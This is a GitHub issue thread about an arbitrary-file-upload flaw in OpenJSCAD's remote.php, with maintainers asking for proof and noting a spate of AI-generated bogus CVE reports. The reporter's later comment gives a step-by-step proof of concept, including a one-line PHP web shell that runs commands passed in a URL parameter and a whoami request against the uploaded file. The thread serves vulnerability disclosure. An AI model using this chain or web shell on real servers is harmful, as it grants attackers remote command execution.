OpenJSCAD.org icon indicating copy to clipboard operation
OpenJSCAD.org copied to clipboard

Published 20 hours ago verified publisher icon jscad

Remote.php has a security issue with arbitrary file uploads

Open Beatriz-ai-boop opened this issue 1 year ago • 4 comments
trafficstars

'packages/web/remote.php' Lack of proper validation and sanitization of the $_REQUEST['url'] parameter. Malicious users could inject malicious URLs, leading to remote code execution or other attacks.Using the basename function may also cause path traversal issues.

Beatriz-ai-boop avatar Jul 09 '24 02:07 Beatriz-ai-boop

@Beatriz-ai-boop you need to be more specific and show an example. Taking into account recent uptick in spam CVE reports, and "AI crap" bots doing CVE search you need to provide proof CVE is real and not just assumed.

hrgdavor avatar Jul 09 '24 07:07 hrgdavor

Wow! Is @Beatriz-ai-boop trying to be helpful?

the good news is that the PHP remote is not being used.

z3dev avatar Jul 09 '24 10:07 z3dev

Here are more details.

  1. First download the project.
  2. run mkdir cache on OpenJSCAD.org-master/packages/web/
  3. request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/remote.php?url=http://127.0.0.1:8099/shell.php

shell.php is:

<?php echo "<?php \$o=exec(\$_GET['c']);echo \$o;?>"?>
  1. request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/cache/240712060740-shell.php?c=whoami

Then you can execute any command based on this php file.

@hrgdavor @z3dev

Beatriz-ai-boop avatar Jul 12 '24 06:07 Beatriz-ai-boop

@Beatriz-ai-boop Go for it! Please make the fixes!

z3dev avatar Jul 12 '24 08:07 z3dev